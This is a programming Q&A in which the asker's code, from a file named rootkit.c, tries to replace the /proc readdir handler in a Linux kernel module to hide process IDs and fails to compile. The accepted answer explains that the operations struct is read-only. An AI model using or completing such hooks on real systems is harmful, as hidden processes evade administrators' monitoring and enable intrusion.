# Why am I getting the error message "assignment of member ‘readdir’ in read-only object"

Tags: c, linux, kernel

When I compile this file, it throws the following error.

```
kit.c: In function ‘hide_pid’://rootkit.c:109:9: error: assignment of member ‘readdir’ in read-only kit.c:
In function ‘restore’ 127
error: assignment of member ‘readdir’ in read-only object
```

Does anybody know why?

```c
int hide_pid(readdir_t *orig_readdir, readdir_t new_readdir)
{
        struct file *filep;

        /*open /proc */
        if((filep = filp_open("/proc",O_RDONLY,0))==NULL)
        {
                return -1;
        }
        /*store proc's readdir*/
        if(orig_readdir)
                *orig_readdir = filep->f_op->readdir;

        /*set proc's readdir to new_readdir*/ //ERROR IN THE LINE BELOW
        filep->f_op->readdir=new_readdir;

        filp_close(filep,0);

        return 0;
}


int restore (readdir_t orig_readdir)
{
        struct file *filep;

        /*open /proc */
if ((filep = filp_open("/proc", O_RDONLY, 0)) == NULL) {
                return -1;
        }

        /*restore /proc's readdir*/ //ERROR BELOW
        filep->f_op->readdir = orig_readdir;

        filp_close(filep, 0);

        return 0;
}
```

Answer (score 2, accepted):

The struct defining the ops vector (f_op) probably uses const in its definition of the readdir field - and probably all the other fields too. It's far more normal to set one's own ops vector than replace one or two methods in an existing ops vector.